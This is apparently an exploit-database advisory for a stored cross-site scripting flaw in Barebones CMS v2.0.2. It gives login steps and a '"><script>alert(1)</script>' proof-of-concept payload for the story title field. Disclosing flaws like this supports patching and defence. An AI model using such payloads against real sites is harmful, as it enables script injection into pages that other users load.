Exploits / Vulnerability Discovered : 2023-06-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Barebones cms v2.0.2 stored crosssite scripting (xss) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
1) Login admin panel and go to new story :
https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
2) Click edit button and write your payload in the title field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button